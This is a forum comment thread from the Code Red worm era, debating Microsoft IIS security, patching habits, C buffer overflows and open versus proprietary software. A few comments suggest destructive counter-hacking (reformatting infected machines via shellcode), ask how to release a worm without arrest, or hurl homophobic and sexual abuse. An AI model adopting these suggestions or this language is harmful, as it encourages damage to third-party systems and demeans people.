No, any C programmer. It is impossible for this bug to occur in pure Java, or ML, or Scheme, etc. etc. You've proved our (somewhat tongue-in-cheek) point - C is to blame.

Re:Stop blaming microsoft

New languages don't make programs vulnerable to buffer overflow. This is a C thang. But since most open source programmers still use C becuase they are stuck back in time and refuse to move on, no one will be admitting it.

Better to blame Microsoft.

Re:Stop blaming microsoft

If you look at C that way. C was meant to allow you to make any functionality you want. You could probably build hardware that cannot ever be networked for those applications but most people use the inherent flexiblity in the hardware and impliment it as needed. If you need security you should not be using raw C anymore than you should be trying to ride a boat motor in a bath tub; think of a boat and a lake as a nice secure library.

Re:Stop blaming microsoft

[JAK]

You're absolutely right. Note to self: If I'm every writing an OS, be sure to use java...

Re:Stop blaming microsoft

bah. You can overflow a buffer regardless of language. Blame the people who wrote FORTRAN, or for that matter, the people who developed assembly.

Re:Stop blaming microsoft

[mr_exit]

You know what... none of that works either. Determined people will always find a way to break things. It doesn't matter if it is a house, a car, an alarm system, or an operating system

One thing my dad told me years ago was: "Locks are only there to stop honest people making mistakes" and the same has been proven with computer systems.
Even the computer equivilent of a bank safe still isn't enough these days.
But that doesn't mean that we should all use the microsoft bank which is just a bucket in the street with a good marketing campain.

Re:Stop blaming microsoft

[Felinoid]

This is not quite true...

It is unlikely your house will be broken into if your living in a "safe" neighborhood.

Criminals prefer easy targets... this has been proven time and time again...

A criminal will target Windows over Linux any day..
Linux CAN be cracked... Windows is an easier target....
[Of course if your really sereous about security you'll look into BSD or Solarus and into a steel door and a dead bolt...
As for my car.. if you want it that bad you can have it...]

Re:Stop blaming microsoft

[fuckallnerds]

don't forget that he sucked dick, too. that negates anything good that he did in his life. man, i hate gay brits, which basically means that i hate all brits.

Re:Stop blaming microsoft

[ryanvm]

I'm so sick of people blaming Microsoft. The released a patch well before Code Red. Get over it.

You're a moron. Windows NT/2000 has some very serious design flaws with regard to operating system security. That is the source of their security woes. Don't the countless "root" exploits that exist for NT demonstrate that to you at all?

If you truly are an NT server admin than I pity you. While you spend half your day researching and applying patches to your servers, BSD and Linux admins get to play around with the really fun stuff.

Re:Stop blaming microsoft

[dgp]

the c language is being efficient when the for loop that copys the input buffer into ram is not checking for an end of buffer condition. if you want that done automatically, use a home-brew memcpy or use a different language with bounds-checking like java.

Re:Stop blaming microsoft

[mpe]

Hrm, I seem to recall the Morris worm exploiting a Sendmail vulnerability.

If used something left enabled by default which almost nobody actually needed. Who actually uses the default.ida file in the first place? Also the Morris worm was way before NT even existed...

So how did your site fare?

How was everyone else's companies affected by this? I've heard rumors it was pretty bad at Microsoft and IBM, how bad was it other places?

Re:So how did your site fare?

[TeraCo]

> I can't understand why nobody is questioning this decision.

I think if your admins can't keep an NT server up to date, they aren't bright enough to think up a new infrastructure.

FYI: My company was fine, although we really only run our authentication/exchange and a few other misc things off Win2K. Our best defense is: A large firewall of unix boxes between us and the real world, and virus scanners on the exchange boxes.

Melissa never affected us, nor did any of the other outbreaks.

Re:So how did your site fare?

At my company no one noticed. I've occasionally check Apache's logs to see how many attempts there have been, but that was just idle curiosity.

good

I urge all of you who were infected by code red to fix your computer so my apache logs don't get filled up with a bunch of crap.

Re:FUD ALERT

Back ups are for disaster recovery. I have put in Sun Patch clusters without any "disasters" so no need to recover any files. We do back everything up for user error(the most common event) hardware failures and the like. Somehow you have learned to accept that a service pack or patch cluster just break things and is another reason to have backups.
Recovering from backups is not a Luxury to be relied upon by shoddy engineering because you may have not lost data but you have down time. That would make you the "negligent moron" to let a vendor talk you into it.
I believe there are floatation devices on aircraft but do you really want to use them on the odd flight? "Don't worry we have a raft".

your mom

[blendin]

your mom is such a slut fool

Re:Remind me again...

[anim8]

-reemul who wishes 2k wasn't so buggy, either, but doesn't want to hear the bitching from folks who need 2 hours and a phone call to a friend to get a soundcard working

A real web server has no use for a sound card.

Re:Warhol Worm proposed: 15 minutes to total infec

[greenrd]

Any opinions on (a) if this would be inherently illegal and (b) how you could minimise your chances of getting arrested if you wrote one?

Completely hypothetical questions, of course. ;)

Re:FUD ALERT

[Holophax]

This comment would almost be worth moderating as funny, as it has been, with the exception of the fact that Service Pack 6 did NOT stop people from accessing the TCP/IP stack, it prevented people from user ports above 1024. Granted, it's still a major error, but a little different from what the original posted implied.

Re:Unforgivable!

The only machines shutdown by this script are those infected by the worm. I doubt too many of us will miss those machines that are sucking down our collective bandwidth.

Re:FUD ALERT

[crywolf]

Funny, I've never been paranoid about installing/patching anything, regardless of the operating system. It seems to me that a GOOD ADMIN would have any important data backed up prior to installing/upgrading any mission critical servers. Just because you're a negligent moron doesn't mean that Windows sucks.

No, Windows sucks entirely on its own merits, and in this case, I am not a negligent moron. This was a fresh install of a public access machine. We have *no* Windows servers. If you like using something that requires backups mid-install, that's up to you.

But you're right about backups. I've learned that I should make an emergency rescue disk with registry backup, followed by a reboot, after every single app I install, so I can catch whichever app it is that corrupts the registry (automatically backed up by Windows after being corrupted?). A minor glitch which will completely destroy the operating system.

What would be funnier....

Is to change the shellcode to stop the machine from coming back after a reboot. I'm not sure if winnt/2k allow the use or /y after a format command, but I'm sure that would grab some media attention. Even if it didn't it would provide some evil satisfaction to all those people sick of seeing their logfiles grow night after night.

ever hear of recalls?

Actually you would be surprised about how often recalls happen on cars. Granted they aren't "patches" per se, but they do occasionally have recalls for problems that they deem serious enough. But you know what? Most of the recalls are voluntary. That is that people actually have to know what kind of car they have and where to look up recall information on it. Frequently they won't get notification from the company they bought it from if anything that was recalled wasn't that serious of a defect. So in that respect, cars are like computers. The owners are STILL RESPONSIBLE for finding out about them and taking their cars to get fixed. The automakers won't just drive to your house and fix them automatically. And I guess as much as I dislike M$ and some of the things that they do, the same thing goes for computers as well. Even non-evil companies make mistakes and release patches. So it's up to each user to be a system administrator and check for this sort of thing. It's not like M$ is going to hold you by the hand and patch your server for you. You should at least be glad that there is a patch, I'd bet money that M$ would hide this problem if they could.

yes-but

[Lumpy]

IIS is written in Visual Basic...

Blame Microsoft!

[extrasolar]

Blame Microsoft!
Even thought the kiddies did it,
Microsoft will take shit for it!
Well, they're not a real company anyway.

(apologees to the southpark people)

IIS is not installed by default!

[badzilla]

Why all these stories of folks with Windows workstations who didn't even know they were running IIS and were surprised to be told they had code red etc. etc.

NT4 requires you get a copy of the "Option Pack" CD before you can install IIS. W2K Pro needs you to re-insert the CD after you installed the OS and click on yes-I-want-IIS. Both pretty hard to do by mistake.

Automatic reply to owners of the host - kinda

[MavEtJu]

I've made a small script to do this. It takes the hostname or IP address of a machine to find out information from the whois-database or the SOA fields of the zone.

It's available from http://www.mavetju.org/networking/tools.phtml as coderedspammer.

Don't think that this will solve your problems, because there are many many badly inconfigured mailers/dns-servers/whois-databases on the internet. See http://www.mavetju.org/networking/whymailfails.pht ml for an overview.

Edwin

Re:Here's how open source would be better...

[cburley]

I wrote:

Can you point to a single thing I said that shows that I "forgot" this one important detail??

You replied:

By assuming that source code makes everything better.

I asked you to quote me, and instead you just make something else up out of whole cloth?

Look, I might well say that having source code hardly ever makes anything worse, but unless a person has a very poor grasp on logic, they're unlikely to believe that a) that means I believe that source code makes everything better and that b) that means I believe that even Ronald Reagan, in the throes of Alzheimer's, can personally negotiate the source code for Apache to find security flaws.

More likely, if you both valued my input and were an honest person, you'd admit that, time and time again in this thread, I've pointed out that the source code is a benefit to everyone because they, or someone they hire, can openly read, modify, discuss, and test it.

It is simply not a matter of having source code available that makes it secure.

Here you continue setting up your strawmen, imputing them to me, and knocking them down. I hope you're having fun; for myself, I tend to tire of arguing with people who pull this stunt.

Can't you simply accept my statement that I did not forget that not everyone can read source code is true? Or are you 100% convinced that I'm either a liar or somewhat self-delusional?

You still have not commented on sendmail

Indeed, I have not commented on a bloated, monolithic Mail Transfer Agent that was originally designed for use on a non-hostile Internet and has been known to have many security holes as it has been grown into something designed to be suitable for use on a hostile Internet, while adding all sorts of features that needn't be part of the core product.

Why should I? After all, you've already discussed it, and I've seen nothing you've said about it worth rebutting -- as far as I know, it's all correct.

What does that prove? I believe it shows the validity of my arguments, especially the one about how large, monolithic applications are more likely to be very difficult to secure than smaller ones built out of discrete, interchangeable components, like qmail, all else being (pertinently) equal.

My guess is, people concerned about security would flock, like birds not flies, to its source code, find out it was a stinking pile of dung, and, not being flies, decide they'd have to start from scratch rather than spend the rest of their lives trying to secure something like that. Which is probably why we now have qmail, an alternative that is radically different from sendmail in almost every way, except they both are "free software" in most ways. How many alternative MTAs for Microsoft OSes came into existence because security-conscious people looked at the source code of Exchange (or whatever it's called) and decided to start from scratch, I wonder?

(And, of course, an app like sendmail is much easier to usefully distribute in proprietary form than one like qmail; the latter is too easy to reverse-engineer in digestible chunks.)

For the same reason Ford "lets" people drive drunk? It's the government's job to protect people from each other--not Microsoft's.

Yet, as I pointed out, Microsoft certainly took it upon itself to not let people print pictures it decided they might not have a legal right to do so.

Therefore, by allowing non-admins to easily enable IIS, they have about the same level of culpability as would Ford if it made sure that any 5-year-old could successfully turn on and drive an Explorer as a means to ensure wide market share.

Remember, I made a fairly broad point about Microsoft, and other proprietary-software vendors, effectively disarming customers (willingly) by not allowing them to see the source and find/fix/discuss the security problems themselves. Do you truly see no additional culpability coming upon these vendors or their end users as a result of this unilateral disarmament against enemies who, in some cases I would think, did not similarly disarm?

Note I am not talking about legal culpability, nor trying to make a distinction regarding exactly who -- MS or a given MS customer -- is culpable. Certainly Linux developers and users aren't culpable for bugs in MS IIS, and I argue that, in the combination of IIS users and MS, its distributor, there exists substantial culpability for any security flaws that are exploited by black hats and that might have been usefully exposed earlier, had the source code been widely and publically available.

However, I guess I do hold MS and other proprietary-software vendors culpable for willingly creating an environment -- a market, if you will -- in which end users don't believe they should care or know about the very concept of source code, the security implications of not being able to view it, etc.

(Sure, they "just wanted to make a profit", which is fine, but let's not allow that priviledge, or right, to cause us to overlook the fact of their culpability by taking the actions they did, especially since that would disadvantage those vendors who did strive, more than others, to inform their customers regarding security concerns, give them some degree of access to source code at least, and so on. Just because a company X does Y to make more profit does not mean we can no longer discuss whether Y contains unfortunate, even "evil", portions. That is, I'm not debating the evilness of corporations -- I'm trying to clarify some issues I believe you've obscured in your posts regarding the value of the respective forms of software generally.)

Microsoft was not expecting a bug in their IIS server anyways.

Then the company is run by fools, which I doubt. Proper engineering, especially of large, complicated systems, includes assuming there will be failures, and handling the risks accordingly.

(You seem to not know much about software engineering, based on statements like that and the other one you made about kernels not being interchangeable. Are you seriously trying to tell people that, without understanding even the most basic concepts of software and vanilla engineering, your views on security trump those of us who do have some understanding of these issues?)

You do have to back up your claim because the original poster implied (if not outright claimed) that open source produced software that was more secure than proprietary.

I need to back up my claims because of something someone else said? Bah.

Besides, here is the first chunk of text to which you responded, as written by the original poster:

Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

Seems like the author of that quote left himself plenty of wiggle room between what he said and what you claim he "implied". I don't know if I'd say it quite as he did -- perhaps he has experience and expertise I don't, to back up his claims -- but I agree with the general thrust, yet don't see him as quite saying that open source produces more secure software than proprietary (a statement that can be interpreted in so many ways, it has little meaning at the point we're at, which amounts, nearly, to debating how many angels can dance on the head of a pin).

An example of one thing to which you have not responded is something I consider to be pretty much an "endgame" in a discussion like this, and that's the fact, pointed out by the original poster and myself, that no proprietary software (of the type that needs to be secure) is ever shipped after its source code has been widely available for open discussion, for testing, even for modification, by the general public. Yet that sort of activity is typical for equivalent free software, which goes through alpha and beta releases in which the source code is, put simply, "there".

Do you really, truly, honestly believe that having the source code widely reviewed and discussed by people with no financial interest in simply parroting a corporate line about security offers no substantial advantage in terms of ensuring there aren't fundamental, or even obscure, flaws in the design and/or implementation of the product?

If you do believe that, then you believe that all the bugs found during the alpha and beta periods of free-software products (including mine) were pretty much irrelevant, or would have been found anyway, i.e. without the source being available.

In that case, I can tell you first-hand that your belief is utterly without foundation. But unless you want access to my email/USENET archives, or wish to explore Linux kernel and other archives yourself, to research the importance of source-based bug-finding during alpha and beta test periods, you'll have to either a) accept that your belief is unsubstantiated or b) call me, and probably plenty of others like me who've developed free software, liars.

So you are saying lets not innovate?

Sheesh, more strawmen. Of course, I never said that. I did point out that free software gives users more choice as to when and how to innovate, upgrade, and so on. Why you insist on excluding the middle ground is beyond me, unless you really care more about appearing to win an argument (using whatever means are at your disposal) than actually learning something that might challenge your cherished assumptions.

I'm sick of Slashdot readers with their holier-than-thou attitude spreading FUD about proprietary software.

Then stop reading /.. Seriously. In fact, you might as well drop the last two words from your sentence, or the last five, or even just use the first five, to say all you, or anyone else, need say. Most of the time I'd probably agree.

The mistake I think you made is picking the wrong example, and the wrong people, to respond to as if they, and we, were "typical" of the stuff, and people, you're "sick" of.

Further, if you're thinking that /. readers somehow represent a coherent viewpoint on this or any other subject, dispense with that notion immediately. It's foolish to believe that of almost any group of more than ten people, much less one of more than 100,000, even if they are voluntarily and freely choosing to air their views in a particular forum.

I'm not trying to sound harsh or have an attitude.

I don't know which is more disturbing: to believe you are exerting an effort to do so, or to believe you aren't.

That is a far cry from denouncing all proprietary software as insecure based on just one vendor (MS).

Another strawman, since neither I nor the original poster made such a denunciation.

You can not prove beyond a shadow of doubt that the source code you have in your hand (drive, whatever) is 100% secure.

More excluding of the (incredibly wide) middle ground, in which a 99% assurance after a careful audit of clean source code is preferable to a 10% assurance that consists entirely of the vendor saying "yeah, it's secure", plus whatever experience in the field might be on hand.

You might also wish to investigate a concept called "proof-carrying code", and similar "proof-based" systems, and compare their deployability in a) a proprietary-software world versus b) a free-software world.

You seem to not trust proprietary vendors, and I do think this has much to do with Microsoft's behavior (and their negative image).

I can understand why you'd have that impression generally, but it does not apply to me. I use Microsoft in my examples of reasons to distrust proprietary vendors solely because they're such a well-understood target. But my experience goes back much further than that.

I remember discovering a bug in 64-bit floating-point comparisons in a (rather obscure, thankfully) computer (I worked for the company designing and building it at the time). Something like, if the difference began in the 33rd bit in a certain direction, the result of the comparison would be wrong.

When I pointed this out to the VP of Engineering, he made it clear the company would not be issuing notifications to the customer base, and certainly not replacing the CPUs already in the field to fix the problem, despite the fact that those particular machines' main selling point (compared with other offerings) was that they did 64-bit floating-point "natively".

How is this kind of willful ignoring, and refusal to communicate to potential victims, of the problem possible in a free-software development project large enough to support most pertinent products? (Even though I described a hardware flaw, I've had similar experiences, though harder to explain simply, in proprietary software companies.) The answer: it pretty much is not possible, because authors of free software simply aren't that interested in hiding information, especially info of that sort.

(Proprietary-software vendors, of course, spend significant human, financial, and legal resources ensuring all their employees, contractors, consultants, vendors, and so on, know the importance of keeping things secret -- even things that could be life-or-death issues.)

I seriously hope you do not go around looking at the source code for the Linux system to find flaws.

Um...why not? In fact, I did casually scroll through some Linux kernel source code around 1992 or 1993, found a bug involving group (vs. owner or world) access in the filesystem, reported it along with a proposed fix, it got accepted.

Why would you have a problem with that?

As far as I can tell, there are a variety of projects around the world that consist of people writing tools that look for certain kinds of bugs that compilers don't find in source code, and using GNU/Linux source code for input. These tools will not likely get run by proprietary vendors (besides, if they do, how will you know for sure they've been run and the results used to improve the product?); certainly their output won't be published, as it has been for the Linux kernel, at least. (Wish I could remember the name of the one project like this I'm sure came about this way, but if you skim Linux kernel discussion archives, perhaps you can find it.)

If you take into consideration the large number of Linux programs then the "eye-count" becomes diminished quickly.

Hey, I "get" your points, but they don't stand up to historical scrutiny, which you can't exactly be blamed for not realizing, because they draw no useful lines beyond which the value clearly diminishes to the point of irrelevency.

Specifically, ten-plus years ago, your predecessors (on newsgroups like gnu.misc.discuss) used pretty much the same logic you're using to explain why free software might have its "niche", beyond which it could not possibly expand, due to lack of resources, qualified programmers, etc.

Examples of things free-software solutions would "never" exist for, from memory (and some of this goes to before google/dejanews coverage of gnu.misc.discuss, which I gather is circa 1994, but I've got my own private archives):

• Operating system kernels (too technical, too few people with enough expertise, wouldn't be secure since nobody would bother with things like code reviews, i.e. no OpenBSD project would exist)

• Fortran compilers (not sexy enough; I fixed that one myself ;-)

• Decent GUIs (i.e. no Gnome or KDE at all, certainly not two completely independent and competitive projects!)

(I know, I know.. free software can make money by selling support, but this is capitalism. Make as much money as you can, right? Which leads to more ignorance; users aren't aware that cheaper alternatives exist. In many cases, users really do not care whether they pay extra or not. They just want the computer to "do as I say").

In the paragraph containing that parenthetical statement, you express much hope/optimisim about proprietary software, which might not be unfounded, but I'll note two things:

• It's not clear to me proprietary vendors are going in the more lenient direction -- in fact, things like the DMCA, plus inferences based on what the MPAA and RIAA are doing (and getting away with), suggests that the vendors that succeed will be those that lock up their software even further, by "hiding" it behind network-based services (.NET?), putting even more legal and practical constraints on finding and openly discussing flaws such as security holes, etc.

• To the extent such vendors do go in the direction you hope, the less they become distinguishable from free software anyway. (You've got to look beneath the labels in some cases, e.g. qmail, especially when making assessments like we're making.)

Regarding the parenthetical statement, especially the part about capitalism, if you are interested, and can be really nice and stop creating strawmen, claiming I said things I didn't (instead, please just quote, okay?), I'll be happy to respond, probably via email, since you might find my views on that subject (free software vis-a-vis market forces) fairly interesting, if not convincing.

I don't know enough about DMCA

It's worth your time to explore it, and learn who supports it, and why -- even just for the security implications of what you'll find out. (And I admit to knowing only a bit of what's going on, but enough, IMO, to speak somewhat authoritatively on the intersection of issues we're discussing.)

Can we please stop picking on the MCSEs?

[Meorah]

They've only got until the end of the year to screw up anything else. If they aren't win2k certified by Dec 31, they're not MCSEs anymore. And for those of you who say that the win2k certification can't be THAT much harder than nt4, I have this to say to you: Don't knock it if you don't have it. Or more precisely, don't knock it if you can't take the time to get it yourself.

about time, I want my internet access back

I work for a school in victoria, Australia. We have had no internet access for over a week due to code red, it would seem that all the schools in victoria using the government schools network aka "VICone" have been in the same position, this is because we are all linked thru a poorly configured wan,
Code red apparently has spread to a large amount of the departments administration servers and has caused major bandwidth contention, with packets flowing around our wan.

All I can say is thank god for Novell NDS and Apache running on Linux,

//RANT//
Why doesnt microsoft just take their domination to the next level and include an auto update component which cant be removed and cant be disabled, Kinda like IE.
//END RANT//

Re:Not the mess they made...

[cyclist1200]

I hate to write a "me too", but I have been waiting to see if somebody would bring this up. Most of the traffic I have seen over the past week have been machines that don't have any web sites running. Therefore I have to assume the user is unaware that they are running IIS, and are probably running W2K Pro, on which IIS is not installed by default. Some of this blame has to shift away from Microsoft. We have to stop pursuing the notion that the ordinary user need no nothing about their computer, or that it is too hard to learn, and start providing some basic, common sense knowledge. It really is that simple. Security can be a basic knowledge component.

Re:Not the mess they made...

[PurpleeDragon]

NT admins now are paper IDIOTS. They needed to come in our field and UPSET what we worked so hard on RESPECT,which these new IDOITS know nothing of, I WISH the impossiable WISH " they all get out of this field and go back to being anything but what US few have built our field to be, YOU idoits , yes i am talking to about 80 percent of you , should leave our FIELD. Taking a LAME test does not mean you earned the right to be called MCSE or computer anything, but from us Real MCSEs and Oldtimers you get the title you can hang high " LAAMER S ". What gets me is that these companies let this crap go on because they pass tests. LOL .. But yet the have no experience what so ever or experience is false. I have interviews the NEW breed of MCSE's for abit and found them to be people of low low skills. sad i tell ya. AKA . Todays expliots should be like before. NO ONE POST THEM , Just RAPE There systems and get them fired, let them get the AXE for being NT JOKEs they are.

Wow, it really is stopping

[mashy]

Yesterday I got an automated phone message from my local RoadRunner provider telling me about CR, whether or not I could be infected, and where to download the patch.

I wokeup this morning to find a pop3 connection visible in my tail -f'd syslog -- from 3 hours before! At this point I'm getting around 3 CRII hits an hour, down from about 6 a minute yesterday. The data transfer light on my modem is also calm.

Has anyone else noticed this yet in their areas? My cable company was late in the process of sending out messages and warnings but it seems to have worked overnight. What are some other experiences?

Re:Wow, it really is stopping

[newimprovedmedia]

I am still receiving many requests for the default.ida file on my apache server, like 10 to 20 an hour. Also my network activity light is blinking like crazy. I am wondering if I should start blocking IPs or what?

Here is the audio

[CTboy]

This is very funny. The video is nicer, but streaming windows media player is hard to copy. It's an explaination from the IBM guy who invented ctrl-alt-delete explaing why he invented it. The setting is what looks like a tv news interview show. Bill Gates is there too.

You'll have to rename the file to mp3. It's easier to download stuff from prohosting if the server doesn't recognize it. You understand. :-)

Re:Here is the audio

[subsolar2]

Well thank ye, that was rather funny. :^)

Re:Not the mess they made...

[rambot]

M$ needs to build into IIS an automatic update utility that can not be easily turned off. Oops, that won't work... then we would have internet traffic jam of a different kind. Seriously though. Then if the admin who was smart enough to turn it off, they would hence self qualify themselves to be competent enough to run IIS unsupervised.

Re:FUD ALERT

[clare-ents]

"
Any good admin would have important data backed up prior to installing.
"

How do you back up the IIS settings on NT 4?

Answer - you can't.

Re:How do you run these scripts

[Dwaine+Garden]

Could someone please explain how to run these scripts? I have been at it for a week. running perl redcode.pl does not work. Anyone?

IIS go bye-bye

[alexburke]

it also gives you an option to permanantly disable IIS

Red Hat must be pleased that Microsoft is now bundling the Red Hat installer with their newest patch...

Re:MS Tool

[well_jung]

What's not amazing it that you'd need to reboot your servers ;)

Re:Not the mess they made...

[mikethegeek]

"It's the mess left by lazy admins who can't be bothered with security patches a month before a worm comes out to exploit them. Shame on the NT admins."

Does this really surprise anyone? MCSE's are trained (and tested) to solve everything by "reboot, reload, reinstall", because Microsoft's way is to "take the easy way out" instead of actually FIXING the problem.

And, so many MS service packs BREAK servers and software when installed, can you also not blame people for NOT rushing ot install them? Even where I work, where we do OS compatibility testing on servers we don't start using new MS service packs until they've been tested and found safe by our internal test group...

I for one expect use of IIS to drop as a consequence of the Code Red virus... Were IIS open source, these holes and backdoors would have been seen LONG ago and fixed. Apache runs MUCH more of the web than does IIS, yet you don't see anywhere near the number of bugs, exploits and DOS worms as does IIS.

Here's how open source would be better...

[mikemulvaney]

Microsoft fixed the problem before there was a problem. I don't see how Open Source would be any better in this regard.

Its true that Microsoft put out a patch before the virus took off, so that's a good thing. But Microsoft releases patches all the time, and that is a bad thing. I'm on the security mailing list from MS, and I get at least 3 or 4 alerts a week. I'm also on the slackware list, and I have received 3 or 4 alerts in the last six months.

The reason for this is because Open Source projects tend to fix their security bugs before they are released. If Apache shipped with something that allowed this kind of remote exploit in one of the 2.0 betas, there is a better chance that someone else out there will see it. What is the chance that someone can do an independent security audit of Windows XP?

Closed source can be perfectly good at closing holes, if the company is as big as Microsoft. But Open Source is much better at closing those holes before they are shipped: many eyeballs make all bugs shallow. Open Source doesn't catch every bug, of course; but enough are found that when the odd hole is announced, it is a big enough deal that the patches are more likely to be installed.

Closed Source hurts Microsoft security in more ways than one. Not only are all default installations compromised, but since so many new patches come out every week most admins don't keep up with them. While this is partially the admin's fault, it is also the fault of the software model that prevents these problems from being found quickly.

-Mike

PS: how do we know that "Microsoft fixed the problem before there was a problem", anyway? The patch came out before this big worm hit, but how many servers were quietly compromised in the last year?

Re:Here's how open source would be better...

[reflective+recursion]

Can you point to a single thing I said that shows that I "forgot" this one important detail??

By assuming that source code makes everything better. It is simply not a matter of having source code available that makes it secure. Grandma sitting at home does not know how to patch source code and recompile. Unless she has something like Window's Update it ain't gonna happen (though I believe Ximian has something akin to this; either way it's irrelevant to the issue).

You still have not commented on sendmail (I noticed you used the less exploited qmail). Sendmail has been exploited numerous times. I believe it proves source code available does not make for inherently secure software. The issue is really this: bugs are in every program. They are in source code that has been released. If a cracker wanted to they surely could find an exploit in some open source server software. There is no way to prove software is secure. I'm not debating whether proprietary makes securer software. I'm saying open source does not inherently make software more secure. Both ways of producing software can produce secure software. IIS is now a secure product up until the next cracker figures a way to break it. This is the same way it has been for Linux, though not a big deal because Linux has always been used in smaller proportion to Windows.

My reason for posting what I did was not to convince you, it was to counter the propaganda you posted, so others may realize there are other views, may consider the various sources for those views, and do the research, or at least the thinking, for themselves. To meet that goal, I need not back up everything I say, any more than you did in your claims about the security of proprietary software as a model, or in any of its specific forms.

It may be propaganda, but as far as I'm concerned it is the truth. You do have to back up your claim because the original poster implied (if not outright claimed) that open source produced software that was more secure than proprietary. There needs to be hard evidence to back that up, because my view is 100% neutral. Proprietary software could very well be insecure garbage in every possible case compared to open source software that has the same functionality. But I do need to see sources for that kind of implication.

If they're "ignorant end-users", why is Microsoft letting them run a web server on a hostile network, allowing their systems to become launching-pads for further hostile actions against other systems? My point is that Microsoft exerts vastly more control over the computing environment of Microsoft users (and willfully so) than any combination of GNU/Linux/*BSD/CPAN authors do over the computing environment of their users

For the same reason Ford "lets" people drive drunk? It's the government's job to protect people from each other--not Microsoft's. Microsoft was not expecting a bug in their IIS server anyways. It was not a wrongdoing on their part. The only reason Microsoft has "control" of users is because of ignorance of what they are doing. I'm sure they can disable or choose not to install IIS (or generally configure their system correctly). IIRC IIS was originally the Microsoft Personal Web Server, which was just a small web server intended for private (i.e. homepage) use. It is ignorance on the users' part to not check for fixes to their software and properly maintain their computer. Using the automobile analogy again, if people who drive Ford Explorers never took their vehicle in for the tire recall then they have no way to claim Firestone did them wrong if an accident occurs (and most likely any court would side with Ford/Firestone if this were the case).

In other words, when the software you paid for the privilege of using , but not studying or improving, fails, you have to not only buy some next-generation form of that software, but newer computers to run it?

Why not? If something breaks in your computer there are times you will have to upgrade a number of components. It could be worse. I'm sure you have heard the stories of programs back in the good ole days even causing fires in the hardware (back when all source was "open").

The answer is: of course that's true, for proprietary software. That's why, of the reasonably high number of 486 CPUs out there running in production mode as mail and web servers, a vanishing percentage, I suspect, run proprietary software for those apps -- instead, they probably run a Linux or *BSD kernel, Apache, qmail, etc.

So you are saying lets not innovate? Lets keep backwards compatibility? Lets stick with 30-year-old designs?

That is, they punished the company that produced a largely-Y2K-compliant system and rewarded the one that boxed them into a corner by creating Y2K-buggy software for years. That's exactly the kind of perverse result one would expect from depending on obscurity rather than openness.

I know the feeling. Right now Linux is making me use antiquated software when I could be using WindowsNT, but I digress (*joke*.. I do like free software (GNU-sense) and Linux, but the truth is it is a very old design. That can not be argued as FUD).

I claim your posts contained much more, and largely uninformed or gratuitous, genuine bashing of free software than mine did of Microsoft.

I'm not bashing free software. I'm sick of Slashdot readers with their holier-than-thou attitude spreading FUD about proprietary software. It can go both ways.

Your arrogance is really over the top. I, of course, have worked for many proprietary-software developers, none of them Microsoft, but can't help noticing which one has survived and flourished as what most people think of as the source of software enabling them to access the Internet.

Okay, I'll give you that one. I'm not trying to sound harsh or have an attitude. I think many people who use Microsoft day-to-day (as a tool, not for enjoyment of computing) would say "Microsoft makes some great products." I believe they do (but I sure don't use anything other than Win98.. and it is a total POS for me). I've heard a few people claim Win2k is greatest thing that ever happened to their computer (or something to the extent). Hey, if it works for them I can't complain (though Code Red did piss me off a little, I would definately not blame Microsoft. It could easily happen with open source in the future as I have seen a great deal of ignorant Linux/BSD users.. especially on Slashdot).

And while I agree that free software isn't, at the level of instantiation (that is, instances of free software), inherently more secure than proprietary, I do claim that it's inherently more secure as a model for software development and deployment. Further, my impression (definitely devoid of necessary research to support it) is that, in the free-software community, well-designed, secure software is a much better predictor of deployment, especially over the long term. Look at how "poorly" qmail is "marketed", yet its installed base is pretty amazing.

I believe people creating open source care more about the quality at times than proprietary vendors. People writing free software do so in their own time, and mostly as a hobby. That is a far cry from denouncing all proprietary software as insecure based on just one vendor (MS).

Name one. Name one that you can show is secure, in a public forum, by reviewing the most important material that should come into evidence: the source code!

That, in itself, is the problem. You can not prove beyond a shadow of doubt that the source code you have in your hand (drive, whatever) is 100% secure. I don't recall the early web browsers having huge security issues (or early BBS software for that matter). I am positive they had bugs that the programmers never knew existed. If you accept the fact that any piece of software has at least one bug at any given time then it is clear that, open source or not, no software is secure. I think the matter is trust. You seem to not trust proprietary vendors, and I do think this has much to do with Microsoft's behavior (and their negative image). I have learned to trust Microsoft enough to get things right a good amount of time, but not enough that I personally would use their software (if I tried Win2k I may even be back to MS, if it really is as good as some claim). I seriously hope you do not go around looking at the source code for the Linux system to find flaws. You must surely trust the coders to do a good job, right? It would take many man-years (decades?) to examine and audit the free software on your typical Linux/BSD/etc. box. There may be a large number of open source coders, but keep in mind they do code on usually one or two programs at a max. If you take into consideration the large number of Linux programs then the "eye-count" becomes diminished quickly.

Ultimately, you believe that security through obscurity, in the form of not only obscuring algorithms, but obscuring the fact that proprietary-software developers have a form of relationship with their customer base that cannot , even under the best of circumstances, be described as "demonstrably committed to mutual security", is the best solution. [snip] Proprietary-software developers do exist that provide some degree of commitment to the security of their customers' installations, but that commitment is, in my experience, "earned" via distinct payments and other consideration, compared to the software they sell. That is, the mere act of acquiring and deploying proprietary software rarely earns a customer any useful commitment from the vendor regarding security. The same goes for free software, in spades, of course, but with free software the customer has not only the original vendor to go to to purchase additional security commitments, but pretty much anyone else in the world, since he has access to the source code, to open forums for discussing its security, and to source-level patches to improve and/or test that security.)

I agree with that point. I believe what will eventually (and already to an extent) happen is proprietary software will move to a strategy as Troll Tech attempted. If the company shall go under (or product is removed from their maintenance, catalog, whatever) it would be released freely (under GPL or somesuch). And there would be a guarantee (in the EULA or what have you) that this would happen. It would benefit proprietary vendors by giving them something they can actually make a profit on, while giving trust to the users incase they should go under (I know, I know.. free software can make money by selling support, but this is capitalism. Make as much money as you can, right? Which leads to more ignorance; users aren't aware that cheaper alternatives exist. In many cases, users really do not care whether they pay extra or not. They just want the computer to "do as I say").

After all, it isn't the free-software development community that pushes for things like the DMCA, is it?

I don't know enough about DMCA, honestly. It may very well be a good idea gone wrong. Then again, it could be about greedy software vendors wanting their way. I'd hope not, but it could be the case.

Re:Here's how open source would be better...

[sheldon]

It sounds as though Slackware doesn't provide very good support. If you check RedHat, they issue about 5-6 security patches a month, on average for their Linux distribution.

I count 20 out on their site for RedHat 7.1 since April of this year.

I use that one as an example, but I suspect if you studied the realm of what ships with RedHat you would find many items would qualify as beta releases, or are projects that are in a constant state of beta.

Apache takes the attitude of shipping a very minimal set of tools. The problems are seldom in Apache, they are in all the third party add-ins.

